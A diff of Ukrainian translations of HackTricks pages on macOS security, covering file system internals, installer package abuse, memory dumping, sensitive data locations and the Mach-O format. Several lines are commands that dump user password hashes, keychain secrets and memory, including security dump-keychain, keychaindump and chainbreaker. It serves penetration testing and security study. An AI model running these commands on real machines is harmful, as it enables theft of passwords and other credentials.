- Сторонні програми **демони**, які **потрібно запускати від імені root**, зазвичай розташовані в `/Library/PrivilegedHelperTools/`
- **Пісочниці** програми відображаються в папці `~/Library/Containers`. Кожна програма має папку, названу відповідно до ідентифікатора пакета програми (`com.apple.Safari`).
- **Пісочниці** програми відображаються в папці `~/Library/Containers`. Кожна програма має папку, названу відповідно до ідентифікатора пакету програми (`com.apple.Safari`).
- **Ядро** розташоване в `/System/Library/Kernels/kernel`
- **Розширення ядра Apple** розташовані в `/System/Library/Extensions`
- **Сторонні розширення ядра** зберігаються в `/Library/Extensions`
@ -56,7 +56,7 @@ macos-installers-abuse.md
- `plutil -p ~/Library/Preferences/com.apple.screensaver.plist`
- `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -`
- `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -`
- **`.app`**: Програми Apple, які дотримуються структури каталогу (це пакет).
- **`.app`**: Додатки Apple, які дотримуються структури каталогу (це пакет).
- **`.dylib`**: Динамічні бібліотеки (як файли DLL Windows)
- **`.pkg`**: Це те ж саме, що і xar (формат розширеного архіву). Команда установника може бути використана для встановлення вмісту цих файлів.
- **`.DS_Store`**: Цей файл є в кожному каталозі, він зберігає атрибути та налаштування каталогу.
@ -65,7 +65,7 @@ macos-installers-abuse.md
- **`.noindex`**: Файли та папки з цим розширенням не будуть індексуватися Spotlight.
- **`.sdef`**: Файли всередині пакетів, що вказують, як можна взаємодіяти з програмою з AppleScript.
### macOS Пакети
### Пакети macOS
Пакет - це **каталог**, який **виглядає як об'єкт у Finder** (приклад пакета - це файли `*.app`).
@ -82,7 +82,7 @@ macos-bundles.md
Подібно до кешу спільного dyld, ядро та розширення ядра також компілюються в кеш ядра, який завантажується під час завантаження.
Щоб витягти бібліотеки з єдиного файлу кешу спільних dylib, можна було використовувати бінарний [dyld_shared_cache_util](https://www.mbsplugins.de/files/dyld_shared_cache_util-dyld-733.8.zip), який, можливо, вже не працює, але ви також можете використовувати [**dyldextractor**](https://github.com/arandomdev/dyldextractor):
Щоб витягти бібліотеки з єдиного файлу кешу спільного dylib, можна було використовувати бінарний [dyld_shared_cache_util](https://www.mbsplugins.de/files/dyld_shared_cache_util-dyld-733.8.zip), який, можливо, зараз не працює, але ви також можете використовувати [**dyldextractor**](https://github.com/arandomdev/dyldextractor):
```bash
# dyld_shared_cache_util
dyld_shared_cache_util -extract ~/shared_cache/ /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e
@ -100,13 +100,13 @@ dyldex_all [dyld_shared_cache_path] # Extract all
Деякі екстрактори не працюватимуть, оскільки dylibs попередньо зв'язані з жорстко закодованими адресами, тому вони можуть переходити на невідомі адреси.
> [!TIP]
> Також можливо завантажити кеш спільних бібліотек інших \*OS пристроїв у macos, використовуючи емулятор в Xcode. Вони будуть завантажені в: ls `$HOME/Library/Developer/Xcode/<*>OS\ DeviceSupport/<version>/Symbols/System/Library/Caches/com.apple.dyld/`, наприклад: `$HOME/Library/Developer/Xcode/iOS\ DeviceSupport/14.1\ (18A8395)/Symbols/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64`
> Також можливо завантажити кеш спільних бібліотек інших \*OS пристроїв в macos, використовуючи емулятор в Xcode. Вони будуть завантажені в: ls `$HOME/Library/Developer/Xcode/<*>OS\ DeviceSupport/<version>/Symbols/System/Library/Caches/com.apple.dyld/`, наприклад: `$HOME/Library/Developer/Xcode/iOS\ DeviceSupport/14.1\ (18A8395)/Symbols/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64`
### Mapping SLC
**`dyld`** використовує системний виклик **`shared_region_check_np`**, щоб дізнатися, чи був SLC змапований (що повертає адресу), і **`shared_region_map_and_slide_np`**, щоб змапувати SLC.
Зверніть увагу, що навіть якщо SLC зсувається при першому використанні, всі **процеси** використовують **ту ж саму копію**, що **усуває захист ASLR**, якщо зловмисник зміг запустити процеси в системі. Це насправді було використано в минулому і виправлено за допомогою спільного регіонального пейджера.
Зверніть увагу, що навіть якщо SLC зсувається при першому використанні, всі **процеси** використовують **ту ж саму копію**, що **усуває захист ASLR**, якщо зловмисник зміг запустити процеси в системі. Це насправді було використано в минулому і виправлено за допомогою спільного регіонального пагера.
Пул гілок - це маленькі Mach-O dylibs, які створюють невеликі простори між відображеннями зображень, що ускладнює перехоплення функцій.
@ -121,13 +121,13 @@ dyldex_all [dyld_shared_cache_path] # Extract all
### Folder permissions
У **папці**, **читання** дозволяє **переглядати її**, **запис** дозволяє **видаляти** та **записувати** файли в ній, а **виконання** дозволяє **переміщатися** по директорії. Отже, наприклад, користувач з **дозволом на читання файлу** всередині директорії, де він **не має дозволу на виконання**, **не зможе прочитати** файл.
У **папці**, **читання** дозволяє **переглядати її**, **запис** дозволяє **видаляти** та **записувати** файли в ній, а **виконання** дозволяє **переміщатися** по директорії. Тож, наприклад, користувач з **дозволом на читання файлу** всередині директорії, де він **не має дозволу на виконання**, **не зможе прочитати** файл.
### Flag modifiers
Є деякі прапори, які можуть бути встановлені у файлах, що змусить файл поводитися інакше. Ви можете **перевірити прапори** файлів всередині директорії за допомогою `ls -lO /path/directory`
- **`uchg`**: Відомий як **uchange** прапор, який **запобігає будь-якій дії** зміни або видалення **файлу**. Щоб встановити його, виконайте: `chflags uchg file.txt`
- **`uchg`**: Відомий як **uchange** прапор, який **запобігає будь-якій дії** зміни або видалення **файлу**. Щоб його встановити, виконайте: `chflags uchg file.txt`
- Користувач root може **зняти прапор** і змінити файл.
- **`restricted`**: Цей прапор робить файл **захищеним SIP** (ви не можете додати цей прапор до файлу).
- **`Sticky bit`**: Якщо директорія має sticky bit, **тільки** власник **директорії або root можуть перейменовувати або видаляти** файли. Зазвичай це встановлюється на директорії /tmp, щоб запобігти звичайним користувачам видаляти або переміщати файли інших користувачів.
@ -145,7 +145,7 @@ dyldex_all [dyld_shared_cache_path] # Extract all
- `UF_HIDDEN` 0x00008000: Підказка, що цей елемент не повинен відображатися в GUI.
- `SF_SUPPORTED` 0x009f0000: Маска прапорів, що підтримуються суперкористувачем.
- `SF_SETTABLE` 0x3fff0000: Маска прапорів, що можуть змінюватися суперкористувачем.
- `SF_SYNTHETIC` 0xc0000000: Маска системних синтетичних прапорів, що є лише для читання.
- `SF_SYNTHETIC` 0xc0000000: Маска системних синтетичних прапорів, що є тільки для читання.
- `SF_ARCHIVED` 0x00010000: Файл архівований.
- `SF_IMMUTABLE` 0x00020000: Файл не може бути змінений.
- `SF_APPEND` 0x00040000: Записи у файл можуть лише додаватися.
@ -176,27 +176,27 @@ drwx------+ 7 username staff 224 15 Apr 19:42 Movies
```bash
ls -RAle / 2>/dev/null | grep -E -B1 "\d: "
```
### Розширені Атрибути
### Розширені атрибути
Розширені атрибути мають ім'я та будь-яке бажане значення, і їх можна переглядати за допомогою `ls -@` та маніпулювати за допомогою команди `xattr`. Деякі загальні розширені атрибути:
Розширені атрибути мають ім'я та будь-яке бажане значення, і їх можна переглядати за допомогою `ls -@` та маніпулювати за допомогою команди `xattr`. Деякі поширені розширені атрибути:
- `com.apple.resourceFork`: Сумісність з ресурсними fork. Також видно як `filename/..namedfork/rsrc`
- `com.apple.resourceFork`: Сумісність з ресурсними форками. Також видно як `filename/..namedfork/rsrc`
- `com.apple.quarantine`: MacOS: механізм карантину Gatekeeper (III/6)
- `metadata:*`: MacOS: різні метадані, такі як `_backup_excludeItem`, або `kMD*`
- `com.apple.lastuseddate` (#PS): Дата останнього використання файлу
- `com.apple.FinderInfo`: MacOS: інформація Finder (наприклад, кольорові мітки)
- `com.apple.TextEncoding`: Визначає кодування тексту ASCII файлів
- `com.apple.TextEncoding`: Визначає кодування тексту файлів ASCII
- `com.apple.logd.metadata`: Використовується logd для файлів у `/var/db/diagnostics`
- `com.apple.genstore.*`: Генераційне зберігання (`/.DocumentRevisions-V100` в корені файлової системи)
- `com.apple.rootless`: MacOS: Використовується System Integrity Protection для маркування файлу (III/10)
- `com.apple.genstore.*`: Генераційне зберігання (`/.DocumentRevisions-V100` у корені файлової системи)
- `com.apple.rootless`: MacOS: Використовується захистом цілісності системи для маркування файлів (III/10)
- `com.apple.uuidb.boot-uuid`: маркування logd епох завантаження з унікальним UUID
- `com.apple.decmpfs`: MacOS: Прозоре стиснення файлів (II/7)
- `com.apple.cprotect`: \*OS: Дані шифрування для кожного файлу (III/11)
- `com.apple.installd.*`: \*OS: Метадані, що використовуються installd, наприклад, `installType`, `uniqueInstallID`
### Ресурсні Forks | macOS ADS
### Ресурсні форки | macOS ADS
Це спосіб отримати **Альтернативні Потоки Даних у MacOS**. Ви можете зберігати вміст всередині розширеного атрибута під назвою **com.apple.ResourceFork** всередині файлу, зберігаючи його в **file/..namedfork/rsrc**.
Це спосіб отримати **Альтернативні потоки даних у MacOS**. Ви можете зберігати вміст всередині розширеного атрибута під назвою **com.apple.ResourceFork** всередині файлу, зберігаючи його в **file/..namedfork/rsrc**.
```bash
echo "Hello" > a.txt
echo "Hello Mac ADS" > a.txt/..namedfork/rsrc
@ -213,9 +213,9 @@ find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf
```
### decmpfs
Розширена атрибутика `com.apple.decmpfs` вказує на те, що файл зберігається в зашифрованому вигляді, `ls -l` відобразить **розмір 0**, а стиснуті дані знаходяться в цьому атрибуті. Кожного разу, коли файл відкривається, він буде розшифрований в пам'яті.
Розширена атрибутика `com.apple.decmpfs` вказує на те, що файл зберігається в зашифрованому вигляді, `ls -l` повідомить про **розмір 0**, а стиснуті дані знаходяться всередині цього атрибута. Кожного разу, коли файл відкривається, він буде розшифрований в пам'яті.
Цей атрибут можна побачити за допомогою `ls -lO`, вказаним як стиснутий, оскільки стиснуті файли також позначені прапором `UF_COMPRESSED`. Якщо стиснутий файл буде видалено з цього прапора за допомогою `chflags nocompressed </path/to/file>`, система не знатиме, що файл був стиснутий, і, отже, не зможе розпакувати та отримати доступ до даних (вона подумає, що він насправді порожній).
Цей атрибут можна побачити за допомогою `ls -lO`, вказаним як стиснутий, оскільки стиснуті файли також позначені прапором `UF_COMPRESSED`. Якщо стиснутий файл буде видалено з цього прапора за допомогою `chflags nocompressed </path/to/file>`, система не знатиме, що файл був стиснутий, і тому не зможе розпакувати та отримати доступ до даних (вона подумає, що він насправді порожній).
Інструмент afscexpand можна використовувати для примусового розпакування файлу.
@ -242,7 +242,7 @@ macos-memory-dumping.md
- **LSRiskCategorySafe**: Файли в цій категорії вважаються **абсолютно безпечними**. Safari автоматично відкриє ці файли після їх завантаження.
- **LSRiskCategoryNeutral**: Ці файли не супроводжуються попередженнями і **не відкриваються автоматично** Safari.
- **LSRiskCategoryUnsafeExecutable**: Файли в цій категорії **викликають попередження**, що вказує на те, що файл є додатком. Це служить заходом безпеки для попередження користувача.
- **LSRiskCategoryMayContainUnsafeExecutable**: Ця категорія призначена для файлів, таких як архіви, які можуть містити виконуваний файл. Safari **викликатиме попередження**, якщо не зможе підтвердити, що всі вмісти безпечні або нейтральні.
- **LSRiskCategoryMayContainUnsafeExecutable**: Ця категорія призначена для файлів, таких як архіви, які можуть містити виконуваний файл. Safari **викличе попередження**, якщо не зможе підтвердити, що всі вмісти безпечні або нейтральні.
## Лог файли

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md
View File

@ -27,7 +27,7 @@
Щоб дослідити вміст бандла, такого як `Safari.app`, можна використовувати наступну команду: `bash ls -lR /Applications/Safari.app/Contents`
Це дослідження виявляє каталоги, такі як `_CodeSignature`, `MacOS`, `Resources`, та файли, такі як `Info.plist`, кожен з яких виконує унікальну роль від забезпечення безпеки програми до визначення її інтерфейсу користувача та операційних параметрів.
Це дослідження виявляє каталоги, такі як `_CodeSignature`, `MacOS`, `Resources`, та файли, такі як `Info.plist`, кожен з яких виконує унікальну роль, від забезпечення безпеки програми до визначення її інтерфейсу користувача та операційних параметрів.
#### Additional Bundle Directories
@ -39,6 +39,6 @@
Ця структура забезпечує, що всі необхідні компоненти інкапсульовані в бандлі, що сприяє модульному та безпечному середовищу програми.
Для отримання більш детальної інформації про ключі `Info.plist` та їх значення, документація розробника Apple надає обширні ресурси: [Apple Info.plist Key Reference](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html).
Для отримання більш детальної інформації про ключі `Info.plist` та їх значення, документація для розробників Apple надає обширні ресурси: [Apple Info.plist Key Reference](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html).
{{#include ../../../banners/hacktricks-training.md}}

16
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
View File

@ -47,9 +47,9 @@ cpio -i < Scripts
Ієрархія файлу DMG може бути різною в залежності від вмісту. Однак для DMG додатків вона зазвичай має таку структуру:
- Верхній рівень: Це корінь образу диска. Він часто містить додаток і, можливо, посилання на папку Додатки.
- Верхній рівень: Це корінь образу диска. Він часто містить додаток і, можливо, посилання на папку Applications.
- Додаток (.app): Це фактичний додаток. У macOS додаток зазвичай є пакетом, що містить багато окремих файлів і папок, які складають додаток.
- Посилання на Додатки: Це ярлик до папки Додатки в macOS. Мета цього полягає в тому, щоб спростити установку додатка. Ви можете перетягнути файл .app на цей ярлик, щоб встановити додаток.
- Посилання на додатки: Це ярлик до папки Applications у macOS. Мета цього полягає в тому, щоб спростити установку додатка. Ви можете перетягнути файл .app на цей ярлик, щоб встановити додаток.
## Підвищення привілеїв через зловживання pkg
@ -71,7 +71,7 @@ cpio -i < Scripts
### Виконання через монтування
Якщо інсталятор записує в `/tmp/fixedname/bla/bla`, можливо **створити монтування** над `/tmp/fixedname` без власників, щоб ви могли **модифікувати будь-який файл під час установки** для зловживання процесом установки.
Якщо інсталятор записує в `/tmp/fixedname/bla/bla`, можливо **створити монтування** над `/tmp/fixedname` без власників, щоб ви могли **модифікувати будь-який файл під час інсталяції** для зловживання процесом інсталяції.
Прикладом цього є **CVE-2021-26089**, який зміг **перезаписати періодичний скрипт** для отримання виконання як root. Для отримання додаткової інформації перегляньте доповідь: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
@ -79,11 +79,11 @@ cpio -i < Scripts
### Порожній вантаж
Можливо просто згенерувати **`.pkg`** файл з **скриптами перед і після установки** без будь-якого реального вантажу, окрім шкідливого ПЗ всередині скриптів.
Можливо просто згенерувати **`.pkg`** файл з **скриптами перед і після інсталяції** без будь-якого реального вантажу, окрім шкідливого ПЗ всередині скриптів.
### JS в xml розподілу
Можливо додати **`<script>`** теги в **xml файл розподілу** пакета, і цей код буде виконано, і він може **виконувати команди** за допомогою **`system.run`**:
Можливо додати **`<script>`** теги в **xml файл розподілу** пакету, і цей код буде виконано, і він може **виконувати команди** за допомогою **`system.run`**:
<figure><img src="../../../images/image (1043).png" alt=""><figcaption></figcaption></figure>
@ -152,9 +152,9 @@ productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pk
```
## Посилання
- [**DEF CON 27 - Розпакування пакетів: Погляд всередину Macos Installer Packages та загальні вразливості безпеки**](https://www.youtube.com/watch?v=iASSG0_zobQ)
- [**OBTS v4.0: "Дикий світ macOS Installer" - Тоні Ламберта**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
- [**DEF CON 27 - Розпакування пакетів: Погляд всередину MacOS Installer Packages**](https://www.youtube.com/watch?v=kCXhIYtODBg)
- [**DEF CON 27 - Розпакування пакетів: Погляд всередину пакетів установника Macos та загальні вразливості безпеки**](https://www.youtube.com/watch?v=iASSG0_zobQ)
- [**OBTS v4.0: "Дикий світ установників macOS" - Тоні Ламберта**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
- [**DEF CON 27 - Розпакування пакетів: Погляд всередину пакетів установника MacOS**](https://www.youtube.com/watch?v=kCXhIYtODBg)
- [https://redteamrecipe.com/macos-red-teaming?utm_source=pocket_shared#heading-exploiting-installer-packages](https://redteamrecipe.com/macos-red-teaming?utm_source=pocket_shared#heading-exploiting-installer-packages)
{{#include ../../../banners/hacktricks-training.md}}

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
View File

@ -6,7 +6,7 @@
### Swap Files
Файли обміну, такі як `/private/var/vm/swapfile0`, служать як **кеші, коли фізична пам'ять заповнена**. Коли в фізичній пам'яті більше немає місця, її дані передаються у файл обміну, а потім повертаються у фізичну пам'ять за потреби. Може бути кілька файлів обміну з іменами, такими як swapfile0, swapfile1 тощо.
Файли обміну, такі як `/private/var/vm/swapfile0`, слугують як **кеші, коли фізична пам'ять заповнена**. Коли в фізичній пам'яті більше немає місця, її дані передаються до файлу обміну, а потім повертаються до фізичної пам'яті за потреби. Може бути кілька файлів обміну з іменами, такими як swapfile0, swapfile1 тощо.
### Hibernate Image
@ -39,7 +39,7 @@ sudo kextutil "/tmp/MacPmem.kext"
#Allow the kext in "Security & Privacy --> General"
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
**Інші помилки** можуть бути виправлені **дозволивши завантаження kext** у "Безпека та конфіденційність --> Загальні", просто **дозвольте** це.
**Інші помилки** можуть бути виправлені **дозволивши завантаження kext** в "Безпека та конфіденційність --> Загальні", просто **дозвольте** це.
Ви також можете використовувати цей **однорядник** для завантаження програми, завантаження kext і дампу пам'яті:
```bash

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
View File

@ -7,7 +7,7 @@
### Тіньові Паролі
Тіньовий пароль зберігається з конфігурацією користувача в plists, розташованих у **`/var/db/dslocal/nodes/Default/users/`**.\
Наступний однорядковий код можна використовувати для вивантаження **всіх відомостей про користувачів** (включаючи інформацію про хеш):
Наступний однорядковий код можна використовувати для виведення **всієї інформації про користувачів** (включаючи інформацію про хеш):
```bash
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
```
@ -43,11 +43,11 @@ security dump-keychain -d #Dump all the info, included secrets (the user will be
Інструмент під назвою **keychaindump** був розроблений для витягування паролів з ключниць macOS, але він стикається з обмеженнями на новіших версіях macOS, таких як Big Sur, як зазначено в [обговоренні](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760). Використання **keychaindump** вимагає від атакуючого отримати доступ і підвищити привілеї до **root**. Інструмент використовує той факт, що ключниця за замовчуванням розблокована під час входу користувача для зручності, що дозволяє додаткам отримувати до неї доступ без повторного введення пароля користувача. Однак, якщо користувач вирішить заблокувати свою ключницю після кожного використання, **keychaindump** стає неефективним.
**Keychaindump** працює, націлюючись на конкретний процес під назвою **securityd**, який Apple описує як демон для авторизації та криптографічних операцій, що є критично важливим для доступу до ключниці. Процес витягування включає в себе ідентифікацію **Master Key**, отриманого з пароля для входу користувача. Цей ключ є необхідним для читання файлу ключниці. Щоб знайти **Master Key**, **keychaindump** сканує купу пам'яті **securityd** за допомогою команди `vmmap`, шукаючи потенційні ключі в областях, позначених як `MALLOC_TINY`. Для перевірки цих пам'яткових місць використовується наступна команда:
**Keychaindump** працює, націлюючись на конкретний процес під назвою **securityd**, який Apple описує як демон для авторизації та криптографічних операцій, що є критично важливим для доступу до ключниці. Процес витягування включає в себе ідентифікацію **Master Key**, отриманого з пароля для входу користувача. Цей ключ є необхідним для читання файлу ключниці. Щоб знайти **Master Key**, **keychaindump** сканує купу пам'яті **securityd** за допомогою команди `vmmap`, шукаючи потенційні ключі в областях, позначених як `MALLOC_TINY`. Для перевірки цих областей пам'яті використовується наступна команда:
```bash
sudo vmmap <securityd PID> | grep MALLOC_TINY
```
Після ідентифікації потенційних майстер-ключів, **keychaindump** шукає в купах певний шаблон (`0x0000000000000018`), який вказує на кандидата для майстер-ключа. Подальші кроки, включаючи деобфускацію, необхідні для використання цього ключа, як зазначено в вихідному коді **keychaindump**. Аналітики, які зосереджуються на цій області, повинні звернути увагу на те, що критичні дані для розшифровки ключа зберігаються в пам'яті процесу **securityd**. Приклад команди для запуску **keychaindump**:
Після ідентифікації потенційних майстер-ключів, **keychaindump** шукає в купах певний шаблон (`0x0000000000000018`), який вказує на кандидата для майстер-ключа. Додаткові кроки, включаючи деобфускацію, необхідні для використання цього ключа, як зазначено в вихідному коді **keychaindump**. Аналітики, які зосереджуються на цій області, повинні звернути увагу на те, що критичні дані для розшифровки ключа зберігаються в пам'яті процесу **securityd**. Приклад команди для запуску **keychaindump**:
```bash
sudo ./keychaindump
```
@ -60,7 +60,7 @@ sudo ./keychaindump
- Загальні паролі
- Приватні ключі
- Публічні ключі
- X509 сертифікати
- Сертифікати X509
- Захищені нотатки
- Паролі Appleshare
@ -90,7 +90,7 @@ hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
# Use the key to decrypt the passwords
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
```
#### **Вивантаження ключів ключниці (з паролями) за допомогою дампу пам'яті**
#### **Витягти ключі з ключниці (з паролями) за допомогою дампу пам'яті**
[Слідуйте цим крокам](../#dumping-memory-with-osxpmem), щоб виконати **дамп пам'яті**
```bash
@ -103,7 +103,7 @@ python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d1
```
#### **Вивантаження ключів ключниці (з паролями) за допомогою пароля користувача**
Якщо ви знаєте пароль користувача, ви можете використовувати його для **вивантаження та розшифровки ключниць, що належать користувачу**.
Якщо ви знаєте пароль користувача, ви можете використовувати його для **вивантаження та розшифрування ключниць, що належать користувачу**.
```bash
#Prompt to ask for the password
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
@ -129,7 +129,7 @@ sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
Ви можете знайти дані Сповіщень у `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/`
Більшість цікавої інформації буде в **blob**. Тому вам потрібно буде **витягнути** цей вміст і **перетворити** його на **людську** **читабельність** або використати **`strings`**. Щоб отримати доступ до нього, ви можете зробити:
Більшість цікавої інформації буде в **blob**. Тому вам потрібно буде **витягнути** цей вміст і **перетворити** його на **людську** **читабельність** або використати **`strings`**. Щоб отримати доступ, ви можете зробити:
```bash
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
@ -145,11 +145,11 @@ for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.s
```
## Налаштування
У додатках macOS налаштування розташовані в **`$HOME/Library/Preferences`**, а в iOS вони знаходяться в `/var/mobile/Containers/Data/Application/<UUID>/Library/Preferences`.
У macOS налаштування програм знаходяться в **`$HOME/Library/Preferences`**, а в iOS вони знаходяться в `/var/mobile/Containers/Data/Application/<UUID>/Library/Preferences`.
У macOS інструмент командного рядка **`defaults`** може бути використаний для **модифікації файлу налаштувань**.
У macOS інструмент командного рядка **`defaults`** можна використовувати для **зміни файлу налаштувань**.
**`/usr/sbin/cfprefsd`** заявляє про XPC сервіси `com.apple.cfprefsd.daemon` та `com.apple.cfprefsd.agent` і може бути викликаний для виконання дій, таких як модифікація налаштувань.
**`/usr/sbin/cfprefsd`** заявляє про XPC сервіси `com.apple.cfprefsd.daemon` та `com.apple.cfprefsd.agent` і може бути викликаний для виконання дій, таких як зміна налаштувань.
## OpenDirectory permissions.plist
@ -218,7 +218,7 @@ common: com.apple.security.octagon.joined-with-bottle
### Сповіщення Apple Push (APN)
У цьому випадку програми можуть реєструватися для **тем**. Клієнт згенерує токен, зв'язавшись із серверами Apple через **`apsd`**.\
Потім постачальники також згенерують токен і зможуть підключитися до серверів Apple, щоб надсилати повідомлення клієнтам. Ці повідомлення будуть локально отримані **`apsd`**, який передасть сповіщення програмі, що його чекає.
Потім постачальники також згенерують токен і зможуть підключитися до серверів Apple, щоб надсилати повідомлення клієнтам. Ці повідомлення будуть локально отримані **`apsd`**, який передасть сповіщення програмі, що чекає на нього.
Налаштування розташовані в `/Library/Preferences/com.apple.apsd.plist`.
@ -236,6 +236,6 @@ sudo sqlite3 /Library/Application\ Support/ApplePushService/aps.db
- **`CFUserNotification`**: Цей API надає спосіб показати на екрані спливаюче вікно з повідомленням.
- **Дошка оголошень**: Це показує в iOS банер, який зникає і буде збережений у Центрі сповіщень.
- **`NSUserNotificationCenter`**: Це дошка оголошень iOS у MacOS. База даних зі сповіщеннями знаходиться в `/var/folders/<user temp>/0/com.apple.notificationcenter/db2/db`
- **`NSUserNotificationCenter`**: Це дошка оголошень iOS в MacOS. База даних зі сповіщеннями знаходиться в `/var/folders/<user temp>/0/com.apple.notificationcenter/db2/db`
{{#include ../../../banners/hacktricks-training.md}}

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
View File

@ -31,7 +31,7 @@ cpu_type_t cputype; /* специфікатор процесора (int) */
cpu_subtype_t cpusubtype; /* специфікатор машини (int) */
uint32_t offset; /* зсув файлу до цього об'єктного файлу */
uint32_t size; /* розмір цього об'єктного файлу */
uint32_t align; /* вирівнювання як степінь 2 */
uint32_t align; /* вирівнювання як ступінь 2 */
};
</code></pre>
@ -106,7 +106,7 @@ uint32_t reserved; /* reserved */
- `MH_OBJECT`: Переміщуваний об'єктний файл (проміжні продукти компіляції, ще не виконувані).
- `MH_EXECUTE`: Виконувані файли.
- `MH_FVMLIB`: Фіксований файл бібліотеки VM.
- `MH_CORE`: Вивантаження коду
- `MH_CORE`: Знімки коду
- `MH_PRELOAD`: Попередньо завантажений виконуваний файл (більше не підтримується в XNU)
- `MH_DYLIB`: Динамічні бібліотеки
- `MH_DYLINKER`: Динамічний зв'язувач
@ -295,19 +295,19 @@ cpsr 0x00000000
### **`LC_LOAD_DYLINKER`**
Містить **шлях до виконуваного файлу динамічного зв'язувача**, який відображає спільні бібліотеки в адресний простір процесу. **Значення завжди встановлюється на `/usr/lib/dyld`**. Важливо зазначити, що в macOS, відображення dylib відбувається в **режимі користувача**, а не в режимі ядра.
Містить **шлях до виконуваного файлу динамічного зв'язувача**, який відображає спільні бібліотеки в адресному просторі процесу. **Значення завжди встановлюється на `/usr/lib/dyld`**. Важливо зазначити, що в macOS, відображення dylib відбувається в **режимі користувача**, а не в режимі ядра.
### **`LC_IDENT`**
Застарілий, але коли налаштований на створення дампів при паніці, створюється дамп ядра Mach-O, а версія ядра встановлюється в команді `LC_IDENT`.
Застарілий, але коли налаштований для генерації дампів при паніці, створюється дамп ядра Mach-O, і версія ядра встановлюється в команді `LC_IDENT`.
### **`LC_UUID`**
Випадковий UUID. Він корисний для чогось безпосередньо, але XNU кешує його разом з рештою інформації про процес. Його можна використовувати в звітах про збої.
Випадковий UUID. Він корисний для чого завгодно, але XNU кешує його разом з рештою інформації про процес. Його можна використовувати в звітах про збої.
### **`LC_DYLD_ENVIRONMENT`**
Дозволяє вказати змінні середовища для dyld перед виконанням процесу. Це може бути дуже небезпечно, оскільки може дозволити виконувати довільний код всередині процесу, тому ця команда завантаження використовується лише в dyld, зібраному з `#define SUPPORT_LC_DYLD_ENVIRONMENT` і додатково обмежує обробку лише змінними у формі `DYLD_..._PATH`, що вказують шляхи завантаження.
Дозволяє вказати змінні середовища для dyld перед виконанням процесу. Це може бути дуже небезпечно, оскільки може дозволити виконувати довільний код всередині процесу, тому ця команда завантаження використовується лише в dyld, зібраному з `#define SUPPORT_LC_DYLD_ENVIRONMENT`, і додатково обмежує обробку лише змінними у формі `DYLD_..._PATH`, що вказують шляхи завантаження.
### **`LC_LOAD_DYLIB`**
@ -373,18 +373,18 @@ size -m /bin/ls
```
## Objetive-C Загальні Розділи
В сегменті `__TEXT` (r-x):
В `__TEXT` сегменті (r-x):
- `__objc_classname`: Імена класів (рядки)
- `__objc_methname`: Імена методів (рядки)
- `__objc_methtype`: Типи методів (рядки)
В сегменті `__DATA` (rw-):
В `__DATA` сегменті (rw-):
- `__objc_classlist`: Вказівники на всі класи Objetive-C
- `__objc_nlclslist`: Вказівники на Неіниві класи Objective-C
- `__objc_catlist`: Вказівник на Категорії
- `__objc_nlcatlist`: Вказівник на Не-Ліниві Категорії
- `__objc_classlist`: Вказівники на всі класи Objective-C
- `__objc_nlclslist`: Вказівники на не-ліниві класи Objective-C
- `__objc_catlist`: Вказівник на категорії
- `__objc_nlcatlist`: Вказівник на не-ліниві категорії
- `__objc_protolist`: Список протоколів
- `__objc_const`: Константні дані
- `__objc_imageinfo`, `__objc_selrefs`, `objc__protorefs`...

42
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
View File

@ -6,13 +6,13 @@
Процес - це екземпляр виконуваного файлу, однак процеси не виконують код, це потоки. Тому **процеси - це лише контейнери для виконуваних потоків**, які забезпечують пам'ять, дескриптори, порти, дозволи...
Традиційно, процеси запускалися в межах інших процесів (за винятком PID 1) шляхом виклику **`fork`**, що створювало точну копію поточного процесу, а потім **дочірній процес** зазвичай викликав **`execve`** для завантаження нового виконуваного файлу та його виконання. Потім був введений **`vfork`**, щоб зробити цей процес швидшим без копіювання пам'яті.\
Традиційно, процеси запускалися в межах інших процесів (за винятком PID 1) шляхом виклику **`fork`**, що створювало точну копію поточного процесу, а потім **дочірній процес** зазвичай викликав **`execve`** для завантаження нового виконуваного файлу та його виконання. Потім **`vfork`** був введений для прискорення цього процесу без копіювання пам'яті.\
Потім був введений **`posix_spawn`**, який поєднує **`vfork`** та **`execve`** в одному виклику та приймає прапори:
- `POSIX_SPAWN_RESETIDS`: Скинути ефективні ідентифікатори до реальних
- `POSIX_SPAWN_SETPGROUP`: Встановити приналежність до групи процесів
